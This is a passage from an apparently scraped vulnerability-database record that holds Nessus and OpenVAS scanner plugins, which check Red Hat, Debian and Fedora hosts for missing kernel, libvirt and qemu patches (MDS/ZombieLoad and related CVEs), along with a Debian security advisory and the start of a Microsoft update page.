The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125039);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:46\");\n\n script_cve_id(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-1000407\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n script_xref(name:\"RHSA\", value:\"2019:1170\");\n script_xref(name:\"IAVA\", value:\"2019-A-0166\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2019:1170) (MDSUM/RIDL) (MFBDS/RIDL/ZombieLoad) (MLPDS/RIDL) (MSBDS/Fallout)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.4\nExtended Update Support.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nSecurity Fix(es) :\n\n* A flaw was found in the implementation of the 'fill buffer', a\nmechanism used by modern CPUs when a cache-miss is made on L1 CPU\ncache. If an attacker can generate a load operation that would create\na page fault, the execution will continue speculatively with incorrect\ndata from the fill buffer while the data is fetched from higher level\ncaches. This response time can be measured to infer data in the fill\nbuffer. 
(CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level\nmicro-optimizations to improve the performance of writing data back to\nCPU caches. The write operation is split into STA (STore Address) and\nSTD (STore Data) sub-operations. These sub-operations allow the\nprocessor to hand-off address generation logic into these\nsub-operations for optimized writes. Both of these sub-operations\nwrite to a shared distributed processor structure called the\n'processor store buffer'. As a result, an unprivileged attacker could\nuse this flaw to read private data resident within the CPU's processor\nstore buffer. (CVE-2018-12126)\n\n* Microprocessors use a 'load port' subcomponent to perform load\noperations from memory or IO. During a load operation, the load port\nreceives data from the memory or IO subsystem and then provides the\ndata to the CPU registers and operations in the CPU's pipelines.\nStale load operations results are stored in the 'load port' table\nuntil overwritten by newer operations. Certain load-port operations\ntriggered by an attacker can be used to reveal data about previous\nstale requests leaking data back to the attacker via a timing\nside-channel. 
(CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative\nexecution may allow an authenticated user to potentially enable\ninformation disclosure via a side channel with local access.\n(CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming\npackets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function\n(CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege\nescalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct\nin netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET\nimplementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver\n(CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink\nmessage (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors\n(CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via\nbNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore\n(CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\n\nBug Fix(es) :\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/vulnerabilities/mds\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:1170\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-7913\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8633\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-11600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-12190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-13215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-16939\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-17558\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2017-1000407\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-1068\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3665\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12126\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-12130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-18559\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-11091\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n 
script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/14\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7\\.4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.4\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-7913\", \"CVE-2016-8633\", \"CVE-2017-1000407\", \"CVE-2017-11600\", \"CVE-2017-12190\", \"CVE-2017-13215\", \"CVE-2017-16939\", \"CVE-2017-17558\", \"CVE-2018-1068\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-18559\", \"CVE-2018-3665\", \"CVE-2019-11091\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2019:1170\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = 
\"RHSA-2019:1170\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", reference:\"kernel-abi-whitelists-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", 
sp:\"4\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", reference:\"kernel-doc-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-3.10.0-693.47.2.el7\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", sp:\"4\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-693.47.2.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-08-15T14:41:38", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-08-15T00:00:00", "published": "2019-06-24T00:00:00", "id": "OPENVAS:1361412562310704469", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704469", "title": "Debian Security Advisory DSA 4469-1 (libvirt - security update)", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704469\");\n script_version(\"2019-08-15T09:18:49+0000\");\n script_cve_id(\"CVE-2017-5715\", \"CVE-2017-5753\", \"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2018-3639\", \"CVE-2019-10161\", \"CVE-2019-10167\", \"CVE-2019-11091\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-15 09:18:49 +0000 (Thu, 15 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-06-24 02:00:21 +0000 (Mon, 24 Jun 2019)\");\n script_name(\"Debian Security Advisory DSA 4469-1 (libvirt - security update)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2019/dsa-4469.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4469-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'libvirt'\n package(s) announced via the DSA-4469-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Two vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the 
virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt's cpu map was updated to make addressing\nCVE-2018-3639, CVE-2017-5753, CVE-2017-5715, CVE-2018-12126, CVE-2018-12127, CVE-2018-12130 and CVE-2019-11091\neasier by supporting the md-clear, ssbd, spec-ctrl\nand ibpb CPU features when picking CPU models without having to fall\nback to host-passthrough.\");\n\n script_tag(name:\"affected\", value:\"'libvirt' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), these problems have been fixed in\nversion 3.0.0-4+deb9u4.\n\nWe recommend that you upgrade your libvirt packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libnss-libvirt\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-clients\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-daemon\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-daemon-system\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-dev\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-doc\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt-sanlock\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libvirt0\", ver:\"3.0.0-4+deb9u4\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);", "cvss": 
{"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:32:14", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the\n ", "modified": "2019-05-22T00:00:00", "published": "2019-05-21T00:00:00", "id": "OPENVAS:1361412562310876390", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310876390", "title": "Fedora Update for qemu FEDORA-2019-6e146a714c", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.876390\");\n script_version(\"2019-05-22T11:13:26+0000\");\n script_cve_id(\"CVE-2018-12126\", \"CVE-2018-12127\", \"CVE-2018-12130\", \"CVE-2019-11091\",\n \"CVE-2017-16845\", \"CVE-2018-11806\", \"CVE-2018-12617\", \"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 11:13:26 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-21 02:10:44 +0000 (Tue, 21 May 2019)\");\n script_name(\"Fedora Update for qemu FEDORA-2019-6e146a714c\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-6e146a714c\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AILCHEKSBI6BWPSUUBLIH7H7VULOXJXL\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the\n 'qemu' package(s) announced via the FEDORA-2019-6e146a714c advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"QEMU is a generic and open source processor\n emulator which achieves a good emulation speed by using dynamic translation.\n QEMU has two operating modes:\n\n * Full system emulation. 
In this mode, QEMU emulates a full system (for\n example a PC), including a processor and various peripherals. It can be\n used to launch different Operating Systems without rebooting the PC or\n to debug system code.\n\n * User mode emulation. In this mode, QEMU can launch Linux processes compiled\n for one CPU on another CPU.\n\nAs QEMU requires no host kernel patches to run, it is safe and easy to use.\");\n\n script_tag(name:\"affected\", value:\"'qemu' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"qemu\", rpm:\"qemu~2.11.2~5.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2019-08-09T14:27:15", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4469-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJune 22, 2019 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : libvirt\nCVE ID : CVE-2019-10161 CVE-2019-10167\n\nTwo vulnerabilities were discovered in Libvirt, a virtualisation\nabstraction library, allowing an API client with read-only permissions\nto execute arbitrary commands via the virConnectGetDomainCapabilities\nAPI, or read or execute arbitrary files via the\nvirDomainSaveImageGetXMLDesc API.\n\nAdditionally the libvirt's cpu 
map was updated to make addressing\nCVE-2018-3639, CVE-2017-5753, CVE-2017-5715, CVE-2018-12126,\nCVE-2018-12127, CVE-2018-12130 and CVE-2019-11091 easier by supporting\nthe md-clear, ssbd, spec-ctrl and ibpb CPU features when picking CPU\nmodels without having to fall back to host-passthrough.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 3.0.0-4+deb9u4.\n\nWe recommend that you upgrade your libvirt packages.\n\nFor the detailed security status of libvirt please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/libvirt\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2019-06-22T16:56:03", "published": "2019-06-22T16:56:03", "id": "DEBIAN:DSA-4469-1:B9B08", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2019/msg00116.html", "title": "[SECURITY] [DSA 4469-1] libvirt security update", "type": "debian", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2019-11-16T10:17:54", "bulletinFamily": "microsoft", "description": "<html><body><p>Learn more about update KB4494441, including improvements and fixes, any known issues, and how to get the update.</p><h2></h2><div class=\"alert-band\"><div class=\"alert alert-info\" role=\"alert\"><p class=\"alert-title\">Note</p><div class=\"row\"><div class=\"col-xs-24\"><p><span>This release also contains updates for Microsoft HoloLens (OS Build 17763.502) released May 14, 2019.</span></p><p>Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.</p></div></div></div></div><h2>Improvements and fixes</h2><div><p>This update includes quality 
